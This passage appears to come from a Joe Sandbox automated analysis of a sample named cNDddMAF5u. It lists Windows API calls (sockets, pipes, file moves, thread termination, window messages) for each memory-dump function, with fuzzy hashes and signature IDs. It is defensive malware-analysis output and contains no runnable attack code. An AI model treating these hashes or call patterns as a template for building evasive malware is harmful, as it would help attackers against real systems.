                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: 1f1c9bb40a2e63211fbfca2685581d01184dfe4484dd49998e0e1bf380629c8d
                                                        • Instruction ID: 759ec3d598dfe65c3ad4ded032a45f4138b2588563cd040cc8e747528efee185
                                                        • Opcode Fuzzy Hash: 1f1c9bb40a2e63211fbfca2685581d01184dfe4484dd49998e0e1bf380629c8d
                                                        • Instruction Fuzzy Hash: C651B3B0D006499FDB11CFA8D845AEEBBFAEF08300F14415BE556E7391D7309A41CB65
                                                        APIs
                                                          • Part of subcall function 0072304E: inet_addr.WSOCK32(?), ref: 0072307A
                                                          • Part of subcall function 0072304E: _wcslen.LIBCMT ref: 0072309B
                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 00721112
                                                        • WSAGetLastError.WSOCK32 ref: 00721121
                                                        • WSAGetLastError.WSOCK32 ref: 007211C9
                                                        • closesocket.WSOCK32(00000000), ref: 007211F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 2675159561-0
                                                        • Opcode ID: 6ae594c1e3409d2b775c7461588f2d98b90439a5b099fb24fb77ec991209e64f
                                                        • Instruction ID: 8adc47329c5d5c59a927bfc6424079651e1060218b62abe84e53a533798ca9e9
                                                        • Opcode Fuzzy Hash: 6ae594c1e3409d2b775c7461588f2d98b90439a5b099fb24fb77ec991209e64f
                                                        • Instruction Fuzzy Hash: 02410531600218AFEB109F24D884BAAB7EAFF45324F148059FD05AB291C778EE41CBE5
                                                        APIs
                                                          • Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0070CF22,?), ref: 0070DDFD
                                                          • Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0070CF22,?), ref: 0070DE16
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0070CF45
                                                        • MoveFileW.KERNEL32(?,?), ref: 0070CF7F
                                                        • _wcslen.LIBCMT ref: 0070D005
                                                        • _wcslen.LIBCMT ref: 0070D01B
                                                        • SHFileOperationW.SHELL32(?), ref: 0070D061
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 3164238972-1173974218
                                                        • Opcode ID: 8d526313c7a5c12f0b947688db0c93e41c12b11fc7c52503f9f2e49809e83fe0
                                                        • Instruction ID: c13e68fd87053f4d8a7eaaa549f85896c476a52fc288dc65f71b8621323c325a
                                                        • Opcode Fuzzy Hash: 8d526313c7a5c12f0b947688db0c93e41c12b11fc7c52503f9f2e49809e83fe0
                                                        • Instruction Fuzzy Hash: C34167B2905219DEDF13EBA4C981EDE77F9AF08340F1001EAE505EB181EA38AA44CB55
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00732E1C
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00732E4F
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00732E84
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00732EB6
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00732EE0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00732EF1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00732F0B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: 8c6d17dc958f42e2cf9ebbc6e55f6a79d041fe3382acef8e9bf7f1e8905e551a
                                                        • Instruction ID: 76db978d6e769c84067033f324c9ee14d6fbff4cbc8a2148b6f0e9aa67095b33
                                                        • Opcode Fuzzy Hash: 8c6d17dc958f42e2cf9ebbc6e55f6a79d041fe3382acef8e9bf7f1e8905e551a
                                                        • Instruction Fuzzy Hash: 99311731684150DFEB21CF18DC8AF6537E0EB4A751F1541A4FA049B2B3CB79A842DB45
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707769
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0070778F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00707792
                                                        • SysAllocString.OLEAUT32(?), ref: 007077B0
                                                        • SysFreeString.OLEAUT32(?), ref: 007077B9
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 007077DE
                                                        • SysAllocString.OLEAUT32(?), ref: 007077EC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 68a26d533bab1bff8f4cd6577f6e03dd343a1bd60c54ccc7193ff7618c678ccc
                                                        • Instruction ID: a6928a013bee1aee457e16a0ed4330ed4b4b0f351dfada62be0ffc17531d0ad5
                                                        • Opcode Fuzzy Hash: 68a26d533bab1bff8f4cd6577f6e03dd343a1bd60c54ccc7193ff7618c678ccc
                                                        • Instruction Fuzzy Hash: 6621B076A04219AFEB14DFA8CC88CBB77ECEB093A47008125FA04DB1A0D678EC41C764
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707842
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00707868
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0070786B
                                                        • SysAllocString.OLEAUT32 ref: 0070788C
                                                        • SysFreeString.OLEAUT32 ref: 00707895
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 007078AF
                                                        • SysAllocString.OLEAUT32(?), ref: 007078BD
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 46a0f29d68d2544c57898cc99bc9da9a3046b4f9d46c5d82bf6f7e3d48bc021a
                                                        • Instruction ID: 7cd648e3d8cf3b33a522bfb6e4e216e582d084012d02953b53b93b2bcc2e807a
                                                        • Opcode Fuzzy Hash: 46a0f29d68d2544c57898cc99bc9da9a3046b4f9d46c5d82bf6f7e3d48bc021a
                                                        • Instruction Fuzzy Hash: 04216272A04214EFEB149FA8DC88DAA77ECEB09760710C125F915DB2E1D678EC41CB68
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 007104F2
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0071052E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateHandlePipe
                                                        • String ID: nul
                                                        • API String ID: 1424370930-2873401336
                                                        • Opcode ID: fddf2355c5058bce4486b9952db17387d516fa23ac733b0d0dfb1c519947d7f3
                                                        • Instruction ID: 5f04e9a20080c1ec9dcfeb4dbcf02e13dc6bc6cf77c1bdd166513f94d98461c3
                                                        • Opcode Fuzzy Hash: fddf2355c5058bce4486b9952db17387d516fa23ac733b0d0dfb1c519947d7f3
                                                        • Instruction Fuzzy Hash: BD217C71500305ABDB209F2DD848E9A7BA5BF44724F204A19F8A1E62E0D7B499E0CFA0
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 007105C6
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00710601
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateHandlePipe
                                                        • String ID: nul
                                                        • API String ID: 1424370930-2873401336
                                                        • Opcode ID: dfbfad0468ffc6e8bcc520c3e816463e8ae478d258f1554e5d9c7b105aa299ae
                                                        • Instruction ID: cdc5b89cfc07720f88b4c32979d691bceb091cd3394304172d78b494e3893902
                                                        • Opcode Fuzzy Hash: dfbfad0468ffc6e8bcc520c3e816463e8ae478d258f1554e5d9c7b105aa299ae
                                                        • Instruction Fuzzy Hash: 692181755003059BDB209F6D8C08ADAB7E4BF95720F204A19F8A1E72E0D7F498E0CBA4
                                                        APIs
                                                          • Part of subcall function 006A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
                                                          • Part of subcall function 006A600E: GetStockObject.GDI32(00000011), ref: 006A6060
                                                          • Part of subcall function 006A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00734112
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0073411F
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0073412A
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00734139
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00734145
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 3b67930b96aad6c048eced31f2c3a8eb16204ed3e19d8b3fcf056ee4ae68246a
                                                        • Instruction ID: e5897f150d34c940104e9483c438d16bfd265cfff8e7a658432f03a8aa321854
                                                        • Opcode Fuzzy Hash: 3b67930b96aad6c048eced31f2c3a8eb16204ed3e19d8b3fcf056ee4ae68246a
                                                        • Instruction Fuzzy Hash: A811B2B214021DBEFF119F64CC86EE77F9DEF09798F014111FA18A2050CA769C61DBA4
                                                        APIs
                                                          • Part of subcall function 006DD7A3: _free.LIBCMT ref: 006DD7CC
                                                        • _free.LIBCMT ref: 006DD82D
                                                          • Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
                                                          • Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0
                                                        • _free.LIBCMT ref: 006DD838
                                                        • _free.LIBCMT ref: 006DD843
                                                        • _free.LIBCMT ref: 006DD897
                                                        • _free.LIBCMT ref: 006DD8A2
                                                        • _free.LIBCMT ref: 006DD8AD
                                                        • _free.LIBCMT ref: 006DD8B8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                        • Instruction ID: ae1737402aa4f2e1c42d28d22f158373e10cff8cb4e5ac7750636e3560ccc2c7
                                                        • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                        • Instruction Fuzzy Hash: 2F115171D40B04AAD5A1BFB1CC57FCB7BDE6F10700F40082EB29DAA292DA65F5055654
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0070DA74
                                                        • LoadStringW.USER32(00000000), ref: 0070DA7B
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0070DA91
                                                        • LoadStringW.USER32(00000000), ref: 0070DA98
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0070DADC
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0070DAB9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 4072794657-3128320259
                                                        • Opcode ID: 906dca424b36607cd39f02499c6253d79990df22a7b7ab38104c5c07f05be353
                                                        • Instruction ID: 32f1d5f5e915cb5b907f9210c162172224690028935f5a7afc2b83e10af9664a
                                                        • Opcode Fuzzy Hash: 906dca424b36607cd39f02499c6253d79990df22a7b7ab38104c5c07f05be353
                                                        • Instruction Fuzzy Hash: 2E0186F2500208BFF7119BE09D89EE7376CE708702F408595B706F2081EA789E844F79
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(0164F2B0,0164F2B0), ref: 0071097B
                                                        • EnterCriticalSection.KERNEL32(0164F290,00000000), ref: 0071098D
                                                        • TerminateThread.KERNEL32(72446D65,000001F6), ref: 0071099B
                                                        • WaitForSingleObject.KERNEL32(72446D65,000003E8), ref: 007109A9
                                                        • CloseHandle.KERNEL32(72446D65), ref: 007109B8
                                                        • InterlockedExchange.KERNEL32(0164F2B0,000001F6), ref: 007109C8
                                                        • LeaveCriticalSection.KERNEL32(0164F290), ref: 007109CF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: e58bf839b264876abd9a234e37eb554efc8647ae7c98f27b9b397cde9b71ec3f
                                                        • Instruction ID: 8c6b6f0de25a4443ce0867c9e17626147ee2b0c1d3b87b96bc7c6fec7de5cc56
                                                        • Opcode Fuzzy Hash: e58bf839b264876abd9a234e37eb554efc8647ae7c98f27b9b397cde9b71ec3f
                                                        • Instruction Fuzzy Hash: D2F0E131442512BBE7525F94EE8DBD67B35FF05703F405015F101608A1C7B9A4B5CF94
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00721DC0
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00721DE1
                                                        • WSAGetLastError.WSOCK32 ref: 00721DF2
                                                        • htons.WSOCK32(?), ref: 00721EDB
                                                        • inet_ntoa.WSOCK32(?), ref: 00721E8C
                                                          • Part of subcall function 007039E8: _strlen.LIBCMT ref: 007039F2
                                                          • Part of subcall function 00723224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0071EC0C), ref: 00723240
                                                        • _strlen.LIBCMT ref: 00721F35
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3203458085-0
                                                        • Opcode ID: 75c1959eba9a9d5b243fa41e395a01fb132f5e0262f26f72da169ba1f0bf2952
                                                        • Instruction ID: f0847b8f905e44355049ebc4cccfeeeec4cd0dff6fdc49f977982c83b97d0294
                                                        • Opcode Fuzzy Hash: 75c1959eba9a9d5b243fa41e395a01fb132f5e0262f26f72da169ba1f0bf2952
                                                        • Instruction Fuzzy Hash: 82B11370604310AFD324EF24D895E2A7BE6BF95318F94894CF4565B2E2CB35EE42CB91
                                                        APIs
                                                        • __allrem.LIBCMT ref: 006D00BA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D00D6
                                                        • __allrem.LIBCMT ref: 006D00ED
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D010B
                                                        • __allrem.LIBCMT ref: 006D0122
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D0140
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1992179935-0
                                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                        • Instruction ID: 789a52e1028e7f1ce8ce85cde3e47e64e10823ee33a71b96b7d7798503dec9e1
                                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                        • Instruction Fuzzy Hash: 0481C072E00706ABE720AF69CC41BAA73EBEF41364F25452FF561DA381E770D9018B94
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006C82D9,006C82D9,?,?,?,006D644F,00000001,00000001,8BE85006), ref: 006D6258
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006D644F,00000001,00000001,8BE85006,?,?,?), ref: 006D62DE
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006D63D8
                                                        • __freea.LIBCMT ref: 006D63E5
                                                          • Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852
                                                        • __freea.LIBCMT ref: 006D63EE
                                                        • __freea.LIBCMT ref: 006D6413
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1414292761-0
                                                        • Opcode ID: 1fe672017f0bda59fc074049c300804b3ab928fbc8a9a43dadb8d586c9973ed2
                                                        • Instruction ID: 52ee46a50e8334df4862fd95ac41680d42a5a37cb441d13014d47e8fe0f600f4
                                                        • Opcode Fuzzy Hash: 1fe672017f0bda59fc074049c300804b3ab928fbc8a9a43dadb8d586c9973ed2
                                                        • Instruction Fuzzy Hash: 3051D072E00216ABEB268F64DC81EEF77ABEB44710F16462AFC05D6341EB34DD45D6A0
                                                        APIs
